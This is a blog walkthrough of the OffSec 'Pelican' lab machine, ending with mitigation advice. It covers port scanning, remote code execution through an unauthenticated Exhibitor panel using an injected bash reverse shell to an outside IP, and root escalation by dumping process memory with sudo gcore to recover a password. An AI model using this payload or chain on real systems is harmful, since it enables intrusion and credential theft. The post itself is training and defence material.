<!DOCTYPE html>
<html lang="en">

<head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
  <title>
  Pelican Offsec Walkthrough · Chief Dennis&#39; Blog
</title>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="color-scheme" content="light dark">




<meta name="author" content="Dennis Drebitca">
<meta name="description" content="Full exploitation of the Pelican target: Exhibitor unauthenticated RCE, ZooKeeper misconfig, memory-dump privilege escalation, and root compromise.">
<meta name="keywords" content="blog,developer,personal,cybersecurity,IT,cloud">



  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="Pelican Offsec Walkthrough">
  <meta name="twitter:description" content="Full exploitation of the Pelican target: Exhibitor unauthenticated RCE, ZooKeeper misconfig, memory-dump privilege escalation, and root compromise.">

<meta property="og:url" content="http://localhost:1313/posts/pelican-walkthrough/">
  <meta property="og:site_name" content="Chief Dennis&#39; Blog">
  <meta property="og:title" content="Pelican Offsec Walkthrough">
  <meta property="og:description" content="Full exploitation of the Pelican target: Exhibitor unauthenticated RCE, ZooKeeper misconfig, memory-dump privilege escalation, and root compromise.">
  <meta property="og:locale" content="en">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:published_time" content="2025-11-29T11:00:00+01:00">
    <meta property="article:modified_time" content="2025-11-29T11:00:00+01:00">
    <meta property="article:tag" content="Exhibitor">
    <meta property="article:tag" content="Exhibitor Unauthenticated RCE">
    <meta property="article:tag" content="Apache-ZooKeeper">
    <meta property="article:tag" content="Gdump">
    <meta property="article:tag" content="SUID">
    <meta property="article:tag" content="Password-Store">
      <meta property="og:see_also" content="http://localhost:1313/posts/offsec_sorcerer/">
      <meta property="og:see_also" content="http://localhost:1313/posts/payday-walkthrough/">
      <meta property="og:see_also" content="http://localhost:1313/posts/clamav-walkthrough/">
      <meta property="og:see_also" content="http://localhost:1313/posts/offsec_cockpit/">
      <meta property="og:see_also" content="http://localhost:1313/posts/offsec_dvr4/">
      <meta property="og:see_also" content="http://localhost:1313/posts/offsec_snookum/">




<link rel="canonical" href="http://localhost:1313/posts/pelican-walkthrough/">


<link rel="preload" href="/fonts/fa-brands-400.woff2" as="font" type="font/woff2" crossorigin>
<link rel="preload" href="/fonts/fa-regular-400.woff2" as="font" type="font/woff2" crossorigin>
<link rel="preload" href="/fonts/fa-solid-900.woff2" as="font" type="font/woff2" crossorigin>


  
  
  <link rel="stylesheet" href="/css/coder.css" media="screen">






  
    
    
    <link rel="stylesheet" href="/css/coder-dark.css" media="screen">
  



 
  
    
    <link rel="stylesheet" href="/css/custom.css" media="screen">
  





<link rel="icon" type="image/svg+xml" href="/images/favicon.svg" sizes="any">
<link rel="icon" type="image/png" href="/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="/images/favicon-16x16.png" sizes="16x16">

<link rel="apple-touch-icon" href="/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="/images/safari-pinned-tab.svg" color="#5bbad5">









</head>






<body class="preload-transitions colorscheme-auto">
  
<div class="float-container">
    <a id="dark-mode-toggle" class="colorscheme-toggle">
        <i class="fa-solid fa-adjust fa-fw" aria-hidden="true"></i>
    </a>
</div>


  <main class="wrapper">
    <nav class="navigation">
  <section class="container">
    
    <a class="navigation-title" href="http://localhost:1313/">
      Chief Dennis&#39; Blog
    </a>
    
    
      <input type="checkbox" id="menu-toggle" />
      <label class="menu-button float-right" for="menu-toggle">
        <i class="fa-solid fa-bars fa-fw" aria-hidden="true"></i>
      </label>
      <ul class="navigation-list">
        
          
            <li class="navigation-item">
              <a class="navigation-link " href="/about/">About</a>
            </li>
          
            <li class="navigation-item">
              <a class="navigation-link " href="/posts/">Catch The Flag</a>
            </li>
          
            <li class="navigation-item">
              <a class="navigation-link " href="/projects/">Projects</a>
            </li>
          
            <li class="navigation-item">
              <a class="navigation-link " href="/tags/">Tags</a>
            </li>
          
            <li class="navigation-item">
              <a class="navigation-link " href="/contact/">Contact me</a>
            </li>
          
        
        
      </ul>
    
  </section>
</nav>


    <div class="content">
      
  <section class="container post">
    <article>
      <header>
        <div class="post-title">
          <h1 class="title">
            <a class="title-link" href="http://localhost:1313/posts/pelican-walkthrough/">
              Pelican Offsec Walkthrough
            </a>
          </h1>
        </div>
        <div class="post-meta">
          <div class="date">
            <span class="posted-on">
              <i class="fa-solid fa-calendar" aria-hidden="true"></i>
              <time datetime="2025-11-29T11:00:00&#43;01:00">
                November 29, 2025
              </time>
            </span>
            <span class="reading-time">
              <i class="fa-solid fa-clock" aria-hidden="true"></i>
              4-minute read
            </span>
          </div>
          <div class="authors">
  <i class="fa-solid fa-user" aria-hidden="true"></i>
    <a href="/authors/dennis-drebitca/">Dennis Drebitca</a></div>

          
          <div class="tags">
  <i class="fa-solid fa-tag" aria-hidden="true"></i>
    <span class="tag">
      <a href="/tags/exhibitor/">Exhibitor</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/exhibitor-unauthenticated-rce/">Exhibitor Unauthenticated RCE</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/apache-zookeeper/">Apache-ZooKeeper</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/gdump/">Gdump</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/suid/">SUID</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/password-store/">Password-Store</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/memory-dump/">Memory Dump</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/rce/">RCE</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/exploitdb-48654/">ExploitDB-48654</a>
    </span></div>

        </div>
      </header>

      <div class="post-content">
        
        <h2 id="pelican-offsec-walkthrough">
  Pelican OffSec Walkthrough
  <a class="heading-link" href="#pelican-offsec-walkthrough">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h2>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_0.png"></p>
<p>This walkthrough covers the full exploitation path for the Pelican target, from initial reconnaissance to root compromise and post-exploitation considerations. We focus on service enumeration, misconfigurations, abusing an exposed Exhibitor instance, credential extraction through memory dumping, and privilege escalation.</p>
<h3 id="1-reconnaissance">
  1. Reconnaissance
  <a class="heading-link" href="#1-reconnaissance">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h3>
<p>First, a ping is made to verify connection with the machine:</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture.png"></p>
<p>After confirming the host is reachable, an aggressive full-port SYN scan is executed to enumerate every exposed TCP service:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">sudo nmap -sS -T5 -vvv -p- <span class="nv">$tgt</span> -Pn -oG nmap_inicial
</span></span></code></pre></div><p>Where the parameters mean:</p>
<ul>
<li>-sS: SYN scan (stealthy and fast)</li>
<li>-T5: Maximum speed (aggressive; may cause packet drops in real environments)</li>
<li>-vvv: Verbose output</li>
<li>-p-: Scan all 65,535 ports</li>
<li>-Pn: Disable host discovery; assume the host is up</li>
<li>-oG: Output in greppable format</li>
</ul>
<p>The scan reveals multiple open ports:</p>
<p><img alt="image" src="Picture-1.png"></p>
<p>Next, a targeted service and version scan is run only on the discovered ports:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">sudo nmap -sCV -vvv -p22,139,445,631,2181,2222,8080,8081,34051 <span class="nv">$tgt</span> -oN nmap_exhaustive
</span></span></code></pre></div><p>And their parameters:</p>
<ul>
<li>-sCV: Run default scripts + version detection</li>
<li>-vvv: Maximum verbosity</li>
<li>-p: Only scan the open ports detected previously</li>
<li>-oN: Output in normal readable format</li>
</ul>
<p>Result:</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_2.png"></p>
<p>Interesting findings:</p>
<ul>
<li>CUPS (631) – occasionally misconfigured, sometimes leaks print jobs or credentials.</li>
<li>Apache ZooKeeper (2181) – when exposed, often allows unauthenticated operations.</li>
<li>Exhibitor (8081) – a ZooKeeper management interface. If left unauthenticated, it is known to be exploitable.</li>
</ul>
<p>Navigating to port 8081 shows the Exhibitor dashboard:</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_3.png"></p>
<h3 id="2-exploitation">
  2. Exploitation
  <a class="heading-link" href="#2-exploitation">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h3>
<p>The unauthenticated Exhibitor panel is vulnerable to remote code execution as documented here:</p>
<p><a href="https://www.exploit-db.com/exploits/48654"  class="external-link" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/48654</a></p>
<p>This exploit works because Exhibitor allows modification of ZooKeeper configuration fields. When these fields are saved, certain fields are <em>executed</em> by the system — leading directly to RCE.</p>
<p>A reverse shell payload is injected into a configuration field:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl"><span class="k">$(</span>bash -c <span class="s1">&#39;bash -i &gt;&amp; /dev/tcp/192.168.45.177/1234 0&gt;&amp;1&#39;</span><span class="k">)</span>
</span></span></code></pre></div><p>We place this payload into one of the editable fields and click Save.</p>
<p>Once Exhibitor reloads the configuration, the system executes the payload and triggers our reverse shell listener.</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_4.png"></p>
<p>Complete payload example:</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_5.png"></p>
<p>It worked — reverse shell obtained as charles:</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_6.png"></p>
<p>Initial foothold secured.</p>
<h3 id="3-privilege-escalation">
  3. Privilege Escalation
  <a class="heading-link" href="#3-privilege-escalation">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h3>
<p>After stabilizing the shell, enumeration tools (linpeas, pspy) are executed.<br>
<code>linpeas</code> reveals an interesting sudo entry:</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_7.png"></p>
<p>We can run:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">sudo /bin/gcore
</span></span></code></pre></div><p>This binary allows privileged users to dump the memory of another process — which is a powerful primitive when misconfigured.</p>
<p>Additionally, a strange SUID binary named password-store is found:</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_8.png"></p>
<p>This hints that some automated process is handling or storing credentials in memory — a prime target for dumping.</p>
<p>To identify relevant running processes, <code>pspy</code> is used:</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_9.png"></p>
<p>We observe that a process related to the password-store or authentication runs with PID 494.</p>
<p>Since we can dump arbitrary process memory via <code>sudo gcore</code>, we extract it:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">sudo /bin/gcore -a -o output.txt <span class="m">494</span>
</span></span></code></pre></div><p>This produces a large ELF core dump. We extract readable strings:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">strings output.txt.494 &gt; output_cleaned.txt
</span></span></code></pre></div><p><img alt="image" src="/posts/pelican-walkthrough/Picture_10.png"></p>
<p>Then search for password-like values inside:</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_11.png"></p>
<p>A valid root password is found embedded in the dump. This confirms the high-impact misconfiguration: sensitive credentials stored in memory + unrestricted memory dump tool = privilege escalation.</p>
<p>Switch to root:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">su root
</span></span></code></pre></div><p>Root access achieved — full compromise. PWNED :)</p>
<p><img alt="image" src="/posts/pelican-walkthrough/Picture_12.png"></p>
<h3 id="4-attack-mitigation">
  4. Attack Mitigation
  <a class="heading-link" href="#4-attack-mitigation">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h3>
<p>Below is an expanded, actionable mitigation guide covering each exploited weakness:</p>
<h4 id="1-remove-or-secure-exhibitor">
  1. Remove or secure Exhibitor
  <a class="heading-link" href="#1-remove-or-secure-exhibitor">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h4>
<p>Exhibitor must never be exposed without authentication.<br>
Mitigations:</p>
<ul>
<li>Enable basic authentication or reverse proxy with access controls.</li>
<li>Restrict access to <code>localhost</code> or internal VLAN only.</li>
<li>Use firewall rules to block external access:
<ul>
<li>Allow only admin IPs.</li>
<li>Block port 8081 from the Internet entirely.</li>
</ul>
</li>
<li>Keep Exhibitor and ZooKeeper patched.</li>
</ul>
<h4 id="2-harden-zookeeper">
  2. Harden ZooKeeper
  <a class="heading-link" href="#2-harden-zookeeper">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h4>
<p>ZooKeeper should not run publicly accessible:</p>
<ul>
<li>Disable the admin API where possible.</li>
<li>Bind to 127.0.0.1.</li>
<li>Use ACLs to restrict operations.</li>
<li>Enable TLS and SASL authentication.</li>
</ul>
<h4 id="3-restrict-sudo-permissions">
  3. Restrict sudo permissions
  <a class="heading-link" href="#3-restrict-sudo-permissions">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h4>
<p>Granting unrestricted sudo access to memory-dump tools is dangerous.</p>
<ul>
<li>Remove <code>/bin/gdump</code> from sudoers unless absolutely necessary.</li>
<li>Use granular sudo rules (e.g., restrict by user/group).</li>
<li>Consider replacing gdump with a safer diagnostic tool that cannot dump arbitrary processes.</li>
</ul>
<h4 id="4-remove-or-sandbox-sensitive-suid-binaries">
  4. Remove or sandbox sensitive SUID binaries
  <a class="heading-link" href="#4-remove-or-sandbox-sensitive-suid-binaries">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h4>
<p>The <code>password-store</code> SUID binary is a major risk.</p>
<ul>
<li>Remove SUID bit unless essential.</li>
<li>Replace custom password-handling scripts with secure, audited alternatives.</li>
<li>Apply AppArmor/SELinux confinement.</li>
</ul>
<h4 id="5-avoid-storing-plaintext-passwords-in-memory">
  5. Avoid storing plaintext passwords in memory
  <a class="heading-link" href="#5-avoid-storing-plaintext-passwords-in-memory">
    <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
    <span class="sr-only">Link to heading</span>
  </a>
</h4>
<p>This is often the root cause of privilege escalation.</p>
<ul>
<li>Use hashed or tokenized credentials.</li>
<li>If a process must temporarily store sensitive material, use secure memory management (mlock, clearing after use).</li>
<li>Keep secrets in secure vaults instead of internal scripts.</li>
</ul>

      </div>


      <footer>
        

<section class="see-also">
  
    
    
    
      <h3 id="see-also-in-offsec">
        See also in Offsec
        <a class="heading-link" href="#see-also-in-offsec">
          <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i>
          <span class="sr-only">Link to heading</span>
        </a>
      </h3>
      <nav>
        <ul>
        
        
          
            <li>
              <a href="/posts/offsec_sorcerer/">Sorcerer Offsec Walkthrough</a>
            </li>
          
        
          
            <li>
              <a href="/posts/payday-walkthrough/">Payday Offsec Walkthrough</a>
            </li>
          
        
          
        
          
            <li>
              <a href="/posts/clamav-walkthrough/">ClamAV Offsec Walkthrough</a>
            </li>
          
        
          
            <li>
              <a href="/posts/offsec_cockpit/">Cockpit Offsec Walkthrough</a>
            </li>
          
        
          
            <li>
              <a href="/posts/offsec_dvr4/">DVR4 Offsec Walkthrough</a>
            </li>
          
        
        </ul>
      </nav>
    
  
</section>


        
        
        
        
        
        
        
      </footer>
    </article>

    
  </section>

    </div>

    <footer class="footer">
  <section class="container">
    ©
    
      2023 -
    
    2025
     Dennis Drebitca 
  </section>
</footer>

  </main>

  

  
  
  <script src="/js/coder.js"></script>
  

  

  


  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
</body>

</html>
